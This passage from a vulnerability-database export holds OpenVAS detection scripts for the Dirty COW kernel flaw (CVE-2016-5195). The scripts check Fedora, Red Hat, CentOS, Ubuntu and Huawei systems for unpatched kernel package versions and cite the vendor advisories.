value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.7.9~100.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-10-25T00:00:00", "id": "OPENVAS:1361412562310871675", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871675", "type": "openvas", "title": "RedHat Update for kernel RHSA-2016:2098-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2016:2098-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871675\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-25 05:53:24 +0200 (Tue, 25 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2016:2098-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es):\n\n * A race condition was found in the way the Linux kernel's memory subsystem\nhandled the copy-on-write (COW) breakage of private read-only memory\nmappings. An unprivileged, local user could use this flaw to gain write\naccess to otherwise read-only memory mappings and thus increase their\nprivileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:2098-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-October/msg00049.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:45:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "In the morning of October 21th, 2016, a security researcher Phil Oester disclosed a local privilege escalation vulnerability in Linux kernel.", "modified": "2020-06-06T00:00:00", "published": "2020-06-05T00:00:00", "id": "OPENVAS:1361412562310108768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108768", "type": "openvas", "title": "Huawei Data Communication: Dirty COW Vulnerability in Huawei Products (huawei-sa-20161207-01-dirtycow)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108768\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-5195\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Dirty COW Vulnerability in Huawei Products (huawei-sa-20161207-01-dirtycow)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"In the morning of October 21th, 2016, a security researcher Phil Oester disclosed a local privilege escalation vulnerability in Linux kernel.\");\n\n script_tag(name:\"insight\", value:\"In the morning of October 21th, 2016, a security researcher Phil Oester disclosed a local privilege escalation vulnerability in Linux kernel. A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could exploit this vulnerability to gain write access to otherwise read-only memory mappings and thus obtain the highest privileges on the system. (Vulnerability ID: HWPSIRT-2016-10050)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2016-5195.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this vulnerability to escalate the privilege levels to obtain administrator privilege.\");\n\n script_tag(name:\"affected\", value:\"5288 V3 versions V100R003C00\n\n9032 versions V100R001C00 V100R001C00SPC101 V100R001C00SPC200\n\nAC6605 versions V200R006C00\n\nAgile Controller-Campus versions V100R002C00 V100R002C10 V100R002C10SPC400 V100R002C10SPC403\n\nAustin versions V100R001C10B290 V100R001C10B680 V100R001C20B110 V100R001C30 V100R001C50\n\nBH620 V2 versions V100R002C00\n\nBH621 V2 versions V100R002C00\n\nBH622 V2 versions V100R002C00\n\nBH640 V2 versions V100R002C00\n\nBalong GU versions V800R200C50B200 V800R200C55B200\n\nBalong GUL versions V700R110C30 V700R110C31 V700R200C00 V700R220C30 V700R500C30 V700R500C31\n\nCAM-L21 versions Versions earlier than C576B130\n\nCH121 V3 versions V100R001C00\n\nCH140 V3 versions V100R001C00\n\nCH220 V3 versions V100R001C00\n\nCH222 V3 versions V100R001C00\n\nCH225 V3 versions V100R001C00\n\nCH226 V3 versions V100R001C00\n\nCarrier-eLog versions V200R003C10\n\nChicago versions V100R001C10\n\nCloudOpera CSM versions SysTool(OSUpgrade)V200R016C10SPC100 SysTool(OSUpgrade)V200R016C10SPC100B021 V200R016C10SPC600\n\nDallas versions V100R001C10\n\nE5573Cs-609 versions Versions earlier than TCPU-V200R001B328D01SP00C00\n\nE5573s-320 versions TCPU-V200R001B180D11SP00C00\n\nE5673s-609 versions Versions earlier than TCPU-V200R001B328D01SP00C00\n\nE5771s-856 versions Versions earlier than TCPU-V200R001B329D07SP00C00\n\nE5878s-32 versions TCPU-V200R001B280D01SP05C00\n\nE6000 Chassis versions V100R001C00\n\nEnterprise Service Solution EIDC versions V100R001C60\n\nFusionCompute versions V100R003C10SPC600 V100R005C00 V100R005C10 V100R005C10U1_B1075917\n\nFusionCube versions V100R002C60RC1\n\nFusionManager versions V100R003C00 V100R003C10 V100R005C00 V100R005C00SPC100 V100R005C00SPC200 V100R005C00SPC300 V100R005C10 V100R005C10SPC300 V100R005C10SPC500 V100R005C10SPC700 V100R005C10SPC703 V100R005C10SPC720T V100R005C10U1_B1075133 V100R005C10U2\n\nFusionStorage Block versions V100R003C00 V100R003C02 V100R003C30\n\nFusionStorage Object versions V100R002C00 V100R002C01\n\nHiDPTAndroid versions V200R001C00 V300R001C00\n\nHiSTBAndroid versions V600R003C00SPC010\n\nHuawei solutions for SAP HANA versions V100R001C00\n\nIPC6122-D versions V100R001C10\n\nIPC6611-Z30-I versions V100R001C00\n\nKII-L21 versions C10B130CUSTC10D003 C185B130CUSTC185D002 C185B140CUSTC185D004 C636B310CUSTC636D001 OTA-C02B131CUSTC02D002 OTA-C185B140CUSTC185D004 OTA-C185B310CUSTC185D004 OTA-C636B140CUSTC636D004 OTA-C636B310CUSTC636D001 OTA-C636B320CUSTC636D001 Versions earlier than C02B140CUSTC02D001 Versions earlier than C10B150CUSTC10D003 Versions earlier than C185B321CUSTC185D001 Versions earlier than C464B140 Versions earlier than C629B140CUSTC629D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B330CUSTC636D002 Versions earlier than C900B130 Versions earlier than C96B140CUSTC96D004\n\nL2800 versions V100R001C00SPC200\n\nLogCenter versions V100R001C10\n\nNEM-AL10 versions Versions earlier than C00B355\n\nNMO-L22 versions Versions earlier than C569B150\n\nOTA- versions KII-L21C636B150CUSTC636D005\n\nOceanStor 18500 versions V100R001C10\n\nOceanStor 18500 V3 versions V300R003C10\n\nOceanStor 18800 V3 versions V300R003C00\n\nOceanStor 5600 V3 versions V300R003C00 V300R003C10\n\nOceanStor Backup Software versions V100R002C00 V100R002C00LHWS01_P385795 V100R002C00SPC200 V200R001C00 V200R001C00SPC200\n\nOceanStor CSE versions V100R001C01SPC103 V100R001C01SPC106 V100R001C01SPC109 V100R001C01SPC112 V100R002C00LSFM01CP0001 V100R002C00LSFM01SPC101 V100R002C00LSFM01SPC102 V100R002C00LSFM01SPC106\n\nOceanStor HDP3500E versions V100R002C00 V100R003C00\n\nOceanStor HVS85T versions V100R001C00 V100R001C10 V100R001C30\n\nOceanStor HVS88T versions V100R001C00\n\nOceanStor N8500 versions V200R001C09 V200R001C91 V200R001C91SPC900\n\nOceanStor Onebox versions V100R003C10\n\nOceanStor ReplicationDirector versions V200R001C00\n\nOnebox Solution versions V100R005C00 V1R5C00RC2\n\nRH1288 V2 versions V100R002C00\n\nRH1288 V3 versions V100R003C00\n\nRH1288A V2 versions V100R002C00\n\nRH2285 V2 versions V100R002C00\n\nRH2285H V2 versions V100R002C00\n\nRH2288 V2 versions V100R002C00\n\nRH2288 V3 versions V100R003C00\n\nRH2288A V2 versions V100R002C00\n\nRH2288E V2 versions V100R002C00\n\nRH2288H V2 versions V100R002C00\n\nRH2288H V3 versions V100R003C00\n\nRH2485 V2 versions V100R002C00\n\nRH5885 V3 versions V100R003C01 V100R003C10\n\nRH5885H V3 versions V100R003C00 V100R003C10\n\nRH8100 V3 versions V100R003C00\n\nV1300N versions V100R002C02\n\nVCM versions V100R001C00 V100R001C10 V100R001C20\n\nVIE-L29 versions Versions earlier than C185B384 Versions earlier than C605B370\n\nX6000 versions V100R002C00\n\nX6800 versions V100R003C00\n\neCloud CC versions V100R001C01LSHU01\n\neLog versions V200R003C10 V200R003C20\n\neOMC910 versions V100R003C00\n\neSight versions V300R003C20 V300R005C00SPC200\n\neSight Network versions V300R006C00 V300R007C00\n\neSpace 8950 versions V200R003C00\n\neSpace IPC versions V100R001C21 V200R001C01 V200R001C02\n\neSpace VCN3000 versions V100R001C01 V100R002C00 V100R002C10 V100R002C20\n\ninCloud Eye versions V200R001C21 V200R001C30\n\ninCloud Payment versions V200R001C30\n\ninCloud Shield versions V200R001C30\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161207-01-dirtycow-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2016-10-26T00:00:00", "id": "OPENVAS:1361412562310882583", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882583", "type": "openvas", "title": "CentOS Update for kernel CESA-2016:2098 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2016:2098 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882583\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 05:00:35 +0200 (Wed, 26 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2016:2098 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the\nLinux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A race condition was found in the way the Linux kernel's memory subsystem\nhandled the copy-on-write (COW) breakage of private read-only memory\nmappings. An unprivileged, local user could use this flaw to gain write\naccess to otherwise read-only memory mappings and thus increase their\nprivileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:2098\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-October/022133.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842924", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842924", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3106-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-xenial USN-3106-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842924\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:05 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3106-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3106-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS\n for Ubuntu 14.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager of\nthe Linux kernel when handling copy-on-write breakage of private read-only\nmemory mappings. A local attacker could use this to gain administrative\nprivileges.\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3106-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3106-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-generic\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-generic-lpae\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-lowlatency\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc-e500mc\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc-smp\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc64-emb\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc64-smp\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-07T00:00:00", "id": "OPENVAS:1361412562310871972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871972", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-c8a0c7eece", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-c8a0c7eece\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n 